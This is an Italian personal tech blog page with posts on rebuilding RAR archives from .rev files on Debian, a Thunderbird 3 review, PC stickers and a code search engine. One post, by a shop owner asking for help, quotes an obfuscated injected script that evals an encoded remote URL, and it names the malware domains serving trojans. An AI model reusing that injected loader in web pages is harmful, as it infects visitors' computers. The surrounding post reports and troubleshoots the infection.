Rar e File .rev: Come ricostruire Archivi su Debian

Recupero Archivio Corrotto Debian

Versione Vado di fretta

– Scarica l’ultima versione 32 o 64 bit di rar per linux da qui
– Scompatta l’archivio tar -xzvf nomepacchetto.tar.gz
– Entra nella cartella e digita sudo make install
– Entra nella cartella con i file dell’archivio e digita rar rc nomepacchetto001.rar
– Digita rar e nomepacchetto001.rar
– Ciao

Versione Raccontiamocela un po

Spesso capita di dover prelevare dal web dei file di grandi dimensioni che per comodità o limiti degli hosting gratuiti, vengono suddivisi in tanti file rar. Se la sfortuna è tua compagnia di avventure, ti puoi ritrovare con uno di questi file non più disponibili o, peggio, con uno o più archivi corrotti.

Che si fa? Ho testato più volte le tecniche “imprecazione” e “pc dalla finestra”.. NON funzionano.

La soluzione è utilizzare i file .rev (se disponibili ovviamente) per ricostruire le parti mancanti. Solitamente quando l’archivio è composto da un notevole numero di parti, i file .rev vengono messi a disposizione per risolvere i problemi menzionati qui sopra.

Il funzionamento è molto semplice, ad 1 file .rev corrisponde un file .rar recuperato. Se hai trovato 2 file rar corrotti, ti serviranno 2 file rev e via dicendo.

Per ricostruire le parti rar mancanti su sistemi windows è molto semplice: premettendo di aver già winrar correttamente installato, basterà riporre tutti i file archivio .rar e .rev nella stessa cartella, cliccare il tasto destro sul primo file (intendo primo file .rar) e selezionare estrai qui. Winrar farà tutto il lavoro e impiegherà del tempo in base alla potenza del processore, quantità di archivi da recuperare e dimensioni files.

Se siete su sistemi linux, come il sottoscritto che utilizza Debian 8 Jessie a 64bit? Come si recupera un archivio corrotto?


Continua a leggere… »

[RISOLTO] Sito Infetto Da Malware: Dove?

In questi giorni mi sono arrivate un paio di notifiche da parte di utenti che aprendo due miei siti (negozi online per la precisione) l’antivirus scatta sull’attenti segnalando codice malevolo. Pensando che fosse qualcos’altro non ho dato molto peso, oggi però l’ho potuto vedere grazie ad uno screenshot.

C’è qualcosa che non va.. guardando sui webmaster tools di Google vedo che su un sito mi segnala una pagina contenente questo codice:

Purtroppo Google ha trovato codice dannoso sul tuo sito.

< img src=”about:blank” onError=’astro=unescape(“%27”);astru=
unescape(“%22”);sksa=eval(“document.getElementById(“+astro+”
seaid”+astro+”).src=unescape(“+astro+”%68%74%74%70%3A%2F%2F”
+astro+”)+document.getElementById(“+astro+”5550″+astro+”).id
+unescape(“+astro+”%2E%69%6E%2F”+astro+”)+”+astro+”129091371
2″+astro+”+unescape(“+astro+”%2E%70%68%70″+astro+”)”);docume
nt.getElementById(“seaid”).src=sksa’ style=”width:300;height
:300;border:0px;” >

mentre sul secondo sito mi dice che è tutto ok.

Facendo qualche ricerca trovo che questo codice è proprio la codifica di un url solitamente composto cosi xxxxx.in/xxxx.php che contiene codice malevolo e fa aprire 2 pdf infetti. Leggo inoltre che ha colpito molti blog su base wordpress.

Per caso ne hai sentito parlare?

Io nei miei due negozi online, creati con cms diversi (zen-cart e virtuemart) non riesco a trovare questo codice, inoltre ho guardato le date di ultima modifica dei file per capire se qualcuno avesse iniettato codice malevolo e non c’è niente di recente. Ho cercato veramente a fondo leggendo tutti i casi e cercando file dopo file eventuali stringhe nascoste, iframe o script, htaccess e file config,  ma niente! E’ tutto in ordine e pulito..

A me personalmente non è mai apparso niente navigandoci e comunque Google non da l’avviso di “sito che può danneggiare il tuo computer”; non so più dove guardare o cosa fare. Credo ci sia qualcosa, perchè avendo ricevuto segnalazioni diverse ho scartato l’idea di un falso positivo o di un problema sul pc con cui si naviga.

Hai qualche consiglio da darmi? esperienze simili? aiuti su dove potrebbe esserci un buco?

I due negozi hanno una versione dei cms è piuttosto datata lo so, però sono le versioni stabili con relative patch; non le ho ancora aggiornate in quanto sono gli ultimi mesi di vita, presto lasceranno il posto ad un negozio tutto nuovo.

Per il momento non mi resta che aspettare l’aggiornamento dei dati in strumenti per webmaster di Google per vedere se lo ritrova.

Ogni consiglio sarà veramente di aiuto, grazie!

P.S.: Ho un buono adwords da 75 euro in più 😀 Potrebbe essere un regalo per chi risolve il caso 😉

P.P.S.: Visitando i siti ricevete un allarme dal vostro antivirus? (se lo avete ovviamente)

UPDATE: Ancora oggi sono in alto mare.. ho potuto testarlo di persona; dopo il tad di chiusura </html> appare il codice postato sopra, richiama un file php che carica delle classi java, fa scaricare dei file pdf e fa partire il media player di windows. Un disastro insomma.

Vedo che il sito dannoso è 3737373.in o in-in.in, trattasi di Un Trojan-Downlaoder.java.openconnection.bu e un trojan Packed.Win32.Krap.ao

UPDATE RISOLUTIVO: Bene, trovata la soluzione. Il codice maligno non riuscivo a scovarlo semplicemente perchè non c’era. -.- Mi ha risposto il provider dicendo che han risolto; un sito ospitato sul mio stesso server stava infettando tutti gli altri.

Bene, anno nuovo server nuovo, passo ad un dedicato 😉

Mozilla Thunderbird 3 Client di Posta Elettronica Gratuito

mozilla-thunderbird-3Da qualche giorno è uscito e sto provando Mozilla Thunderbird 3, un programma per la gestione della posta elettronica gratuito e open source di casa Mozilla, il fratello di Mozilla Firefox.

L’installazione è stata semplicissima, dopo averlo scaricato dal sito ufficiale ho fatto partire il setup direttamente senza disinstallare la versione 2 che avevo e ha eseguito un aggiornamento senza problemi. Ha riportato tutti i miei account, regole, indirizzi messaggi, tutto in ordine.

Unica incompatibilità è stata con il calendario lightning, la versione installata che avevo non andava bene ed era un problema noto. Visto che senza calendario non potevo stare di certo, mi son messo a cercare e ho installato la versione nightly builds (development builds); è in fase di sviluppo però non ho riscontrato problemi, anzi ne ha risolti un paio che avevo. Ovviamente mi ha riportato tutti gli appuntamenti e attività già programmate, in attesa della versione 1.0 questa fa il suo lavoro.

Cosa offre di nuovo questo client di posta elettronica?
Continua a leggere… »

69 Etichette Powered By da Attaccare al Tuo Pc!

Raccolta di 69 etichette della serie Powered By che puoi ritagliare, plastificare ed attaccare al case del tuo pc o portatile.

Un modo originale per sostituire l’odiato simbolino onnipresente “Designed for Microsoft Windows”.




Continua a leggere… »

Motore di Ricerca di Codice Open Source

Koders

Koders

Surfando nella rete oggi mi sono imbattuto in Koders.com, motore di ricerca per codice Open Source.

Nell’home page è in evidenza la scritta 2 miliardi di linee di codice a disposizione e questo mi ha incuriosito subito a provare. L’utilizzo è semplice, c’è la classica casella di ricerca con la possibilità di profilare le ricerche in base al linguaggio di programmazione e alla licenza del codice fornito.

Io ho fatto alcune ricerche di prova scegliendo Php come linguaggio e lasciando All licenses, come parola cercata ho usato “form” e mi sono usciti 209,838 risultati, pezzi di codice php open source; la disposizione è chiara ed essenziale, nome della funzione, codice vero e proprio, linguaggio e il link al progetto.

Sempre nella home possiamo trovare degli esempi di ricerca per capire come sfruttare questo motore e il link per accedere al forum.

Altra features non da poco è la disponibilità di plug-in per tutti i linguaggi e plug-in per il solo linguaggio scelto, installabile  per il nostro amato Firefox o programmi IDE come Eclipse o Visual Studio dal 2003 in poi.
Continua a leggere… »